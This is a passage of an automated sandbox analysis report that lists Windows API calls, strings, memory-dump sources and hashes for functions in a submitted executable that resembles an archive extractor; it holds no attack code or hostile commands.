                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                    • Opcode ID: 414f3f4c71cd33397467fe36667d59c1b55c8c34832ead59fd1c98d68fa3dd62
                                                                                                                                                                                                    • Instruction ID: deb3cba768e55de2b9328526ea3b5b9901d067972b2c373742791e5d2c23ae44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 414f3f4c71cd33397467fe36667d59c1b55c8c34832ead59fd1c98d68fa3dd62
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F08970485B159FDB318A64C458792B7E8FB23331F149B5ED0EBC29F4D761E68D8A40

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 0088C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0088C2B1
                                                                                                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0088C2C4
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0088C2E0
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0088C2E7
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0088C321
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0088C358
                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0088C36E
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088C38C
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088C39C
                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088C3B8
                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088C3D4
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088C404
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0088C417
                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0088C41E
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088C477
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0088C48A
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0088C4A7
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0088C4C7
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088C4D7
                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088C4F1
                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088C509
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088C535
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0088C548
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088C59C
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0088C5AF
                                                                                                                                                                                                      • Part of subcall function 0088AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0088AF35
                                                                                                                                                                                                      • Part of subcall function 0088AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008AE72C,?,?), ref: 0088AF84
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                                                                                                    • Opcode ID: bc76ca90745225a7d17cb692478a3cb5335e416fe6fbc878ba0047ad76c4a144
                                                                                                                                                                                                    • Instruction ID: bb61c5eeaec92a7f9623bff44984e6f239a03474a7689ba9699b8f7bb0568772
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc76ca90745225a7d17cb692478a3cb5335e416fe6fbc878ba0047ad76c4a144
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4919272248348BBE621EBA4CC49FFB77ACFB4A700F004919B649D6085D775EA048B73
                                                                                                                                                                                                    Function 00876FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00876FAA
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00877013
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00877084
                                                                                                                                                                                                      • Part of subcall function 00877A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAB
                                                                                                                                                                                                      • Part of subcall function 00877A9C: GetLastError.KERNEL32 ref: 00877AF1
                                                                                                                                                                                                      • Part of subcall function 00877A9C: CloseHandle.KERNEL32(?), ref: 00877B00
                                                                                                                                                                                                      • Part of subcall function 0087A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0087977F,?,?,008795CF,?,?,?,?,?,008A2641,000000FF), ref: 0087A1F1
                                                                                                                                                                                                      • Part of subcall function 0087A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0087977F,?,?,008795CF,?,?,?,?,?,008A2641), ref: 0087A21F
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00877139
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00877155
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00877298
                                                                                                                                                                                                      • Part of subcall function 00879DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008773BC,?,?,?,00000000), ref: 00879DBC
                                                                                                                                                                                                      • Part of subcall function 00879DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00879E70
                                                                                                                                                                                                      • Part of subcall function 00879620: CloseHandle.KERNELBASE(000000FF,?,?,008795D6,?,?,?,?,?,008A2641,000000FF), ref: 0087963B
                                                                                                                                                                                                      • Part of subcall function 0087A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A501
                                                                                                                                                                                                      • Part of subcall function 0087A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A532
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                                                                                                    • Opcode ID: b21597edecdaadb71030bbffaf46b10a8c6969a873f49a4bb2473e17374cde99
                                                                                                                                                                                                    • Instruction ID: d093fb2eb464f53a5193d5bb6f8b00cfb17bd4979cebd0f6ac45152ea215a075
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b21597edecdaadb71030bbffaf46b10a8c6969a873f49a4bb2473e17374cde99
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9C10C71904644AAEB25EB78CC81FEEB3A8FF04300F408559F55EE7246E734EA44CB62
                                                                                                                                                                                                    Function 0089D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                                                                    • Opcode ID: 72199bb5830451905cb238c384ab2a225747315ff4a0c9825e5b610837aa4568
                                                                                                                                                                                                    • Instruction ID: 675e181f92e1a063f43dd03ca71552e9b7e38ed0b8a13e23b7a3b613841d5dcb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72199bb5830451905cb238c384ab2a225747315ff4a0c9825e5b610837aa4568
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65C23771E086288FDF25EE289D407EABBB5FB44315F1841EAD44EE7241E775AE818F40
                                                                                                                                                                                                    Function 008732F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                                                                                                    • Opcode ID: 747b8fbc1840a07a953ba599607ff614241523c9b285872cc5ef437256333386
                                                                                                                                                                                                    • Instruction ID: d06e2990b6cec6effc8a8c3dbe50766965390f024de3c0e95df6c2878748e89b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 747b8fbc1840a07a953ba599607ff614241523c9b285872cc5ef437256333386
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E32D2715102849BDB18DF78C895AE93BA5FF55300F04847DFD8ECB28ADA70D649CB22
                                                                                                                                                                                                    Function 0087286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00872874
                                                                                                                                                                                                    • _strlen.LIBCMT ref: 00872E3F
                                                                                                                                                                                                      • Part of subcall function 008802BA: __EH_prolog.LIBCMT ref: 008802BF
                                                                                                                                                                                                      • Part of subcall function 00881B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087BAE9,00000000,?,?,?,00010464), ref: 00881BA0
                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00872F91
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                                                                                                    • String ID: CMT
                                                                                                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                                                                                                    • Opcode ID: 3c500c223d6952e3428c3389cdfe6460d2c3c4360a748fbcf0a9f44085bb4b4f
                                                                                                                                                                                                    • Instruction ID: 47438d2131d41b9a3aa3d4ce782959cb00ae2dcb462f59b241230b9f49c86ce6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c500c223d6952e3428c3389cdfe6460d2c3c4360a748fbcf0a9f44085bb4b4f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB62E1715002448FDB29DF28C885AEA3BA1FF54310F08857EED9ECB28ADB75D945CB61
                                                                                                                                                                                                    Function 0088F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0088F844
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0088F910
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0088F930
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0088F93A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                    • Opcode ID: 8ef3e9ca17fb6aae9444784a884bb21ae13f93fdec0354359eac0f008af7d21f
                                                                                                                                                                                                    • Instruction ID: fc62e618c3425b53a13a4f377e306ff037087d448235b76f3c9ce2bbdad104ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ef3e9ca17fb6aae9444784a884bb21ae13f93fdec0354359eac0f008af7d21f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16311875D452199BDB20EFA4D9897CCBBB8FF08304F1040EAE60CAB251EB719B858F45
                                                                                                                                                                                                    Function 0088E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • VirtualQuery.KERNEL32(80000000,0088E5E8,0000001C,0088E7DD,00000000,?,?,?,?,?,?,?,0088E5E8,00000004,008D1CEC,0088E86D), ref: 0088E6B4
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0088E5E8,00000004,008D1CEC,0088E86D), ref: 0088E6CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                                                                                                    • Opcode ID: 9f0d4d6b97446874078de8c651e3d70c1682fce61e8edbb9114d53371727b108
                                                                                                                                                                                                    • Instruction ID: f09b7c3911505b28b4245574e37d6965ee123a28ece9accef711bade9627639f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f0d4d6b97446874078de8c651e3d70c1682fce61e8edbb9114d53371727b108
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE01A7726001096BDB14EE29DC49BDD7BAAFFC5324F0CC124FD59D7154E634D9058790
                                                                                                                                                                                                    Function 00898EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00898FB5
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00898FBF
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00898FCC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                    • Opcode ID: 8ea30199e93ffe9c2300d1af4ad0962f8763b7866a37bdd07e74590e708944e1
                                                                                                                                                                                                    • Instruction ID: 9b9c4ae0db53c7cdcbf707c5e024b1d52e585b4262cc0f479e7c40cff81cb687
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ea30199e93ffe9c2300d1af4ad0962f8763b7866a37bdd07e74590e708944e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231D7749012199BCB21EF28D88979CBBB8FF09310F5041EAE51CA7251EB309F818F45
                                                                                                                                                                                                    Function 0089D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                                                                                    • Instruction ID: 37a296d836f76064bf5bed6053ee979b19119e104b574694502cfa7be3face35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52022B71E002199FDF14DFA9C9806ADB7F1FF88314F298269E919E7385D730AA41CB94
                                                                                                                                                                                                    Function 0088AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0088AF35
                                                                                                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,008AE72C,?,?), ref: 0088AF84
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2169056816-0
                                                                                                                                                                                                    • Opcode ID: 9589ed155844b20a5737e6ca8afb296707a486bd1236a09dfd98165d27b20029
                                                                                                                                                                                                    • Instruction ID: abb96be27e20fb23ae2b7998f841b2b4ee0972569b3b9e4950f00a3e59be1b7f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9589ed155844b20a5737e6ca8afb296707a486bd1236a09dfd98165d27b20029
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5012C7A240319AAE7109FA4EC45F9A77BCFF09710F009422FB05E7191E370AA19CBA5
                                                                                                                                                                                                    Function 00876C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
